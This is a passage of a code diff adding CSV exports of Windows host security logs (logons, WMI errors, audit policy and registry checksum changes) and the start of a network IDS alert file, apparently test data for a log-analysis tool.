NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:05.829",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:04.033",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""", +"May 22, 2020 @ 15:12:54.806",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:12:54.776",3,"The database engine attached a database","""SearchIndexer (4592,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0009:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000025 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.005410 -0.005191 (1) WT +J(0) +M(C:0K, Fs:47, WS:124K # 0K, PF:96K # 0K, P:96K) +[3] 0.013639 -0.006595 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:128K # 0K, PF:140K # 0K, P:140K) +[4] 0.000084 +J(0) +[5] - +[6] - +[7] - +[8] 0.002228 -0.000741 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:204K # 0K, PF:644K # 0K, P:644K) +[9] 0.042161 -0.000127 (5) CM -0.041833 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 44K, PF:256K # 168K, P:256K) +[10] 0.000301 -0.000204 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 44K, PF:96K # 96K, P:96K) +[11] 0.000015 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000035 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:12:54.647",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:12:54.606",3,"The database engine is starting a new instance","""SearchIndexer (4592,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""", +"May 22, 2020 @ 15:12:49.719",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\NETWORK SERVICE; ClientProcessId = 3088; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Product FROM Win32_BaseBoard; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:12:48.614",5,"SessionEnv was unavailable to handle a notification event","""The winlogon notification subscriber was unavailable to handle a notification event.""", +"May 22, 2020 @ 15:12:45.443",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:12:43.568",3,"Ossec agent started.",,"ossec: Agent started: 'windows-10->any'." +"May 22, 2020 @ 15:11:26.071",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T13:17:09Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:11:13.361",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:11:13.257",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:10:32.204",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 22, 2020 @ 15:10:25.736",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:25.720",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesConfigured FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:25.705",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:25.689",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesRunning FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:23.018",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\CIMV2 : SELECT SMBIOSAssetTag FROM Win32_SystemEnclosure ; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:23.001",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4012; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ID FROM Win32_ServerFeature; ResultCode = 0x80041010; PossibleCause = Unknown""", +"May 22, 2020 @ 15:10:20.471",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:10:06.455",3,"Service startup type was changed","""The start type of the Windows Modules Installer service was changed from demand start to auto start.""", +"May 22, 2020 @ 15:09:55.485",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T13:16:40Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:09:32.985",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:09:28.904",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:09:15.715",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:09:15.708",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:09:10.849",5,"Name resolution for the name www.bbc.com timed out","""Name resolution for the name www.bbc.com timed out after none of the configured DNS servers responded.""", +"May 22, 2020 @ 15:09:07.785",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 22, 2020 @ 15:09:01.487",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +" +"May 22, 2020 @ 15:09:01.379",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:08:44.237",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:08:44.224",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive WHERE DeviceID LIKE '%PHYSICALDRIVE0%'; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:08:44.194",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:08:31.202",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:08:17.757",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 3256; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : select ChassisTypes from Win32_SystemEnclosure; ResultCode = 0x80041032; PossibleCause = Unknown""", +"May 22, 2020 @ 15:07:55.054",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: 'b40de87500ee3eed90c2ce3ce8c7946f' +New md5sum is : '9d15aff4d26f802c3c4d3d74a00d8d4d' +Old sha1sum was: '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +New sha1sum is : '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +" +"May 22, 2020 @ 15:07:52.691",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""", +"May 22, 2020 @ 15:07:51.478",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""", +"May 22, 2020 @ 15:07:48.108",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", diff --git a/data/NULLTEST_NIDS.csv b/data/NULLTEST_NIDS.csv new file mode 100644 index 0000000..7fa4f50 --- /dev/null +++ b/data/NULLTEST_NIDS.csv @@ -0,0 +1,92 @@ +"@timestamp",message,"log.file.path" +"Apr 4, 2020 @ 14:17:21.957","04/04/2020-14:17:15.892884 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] 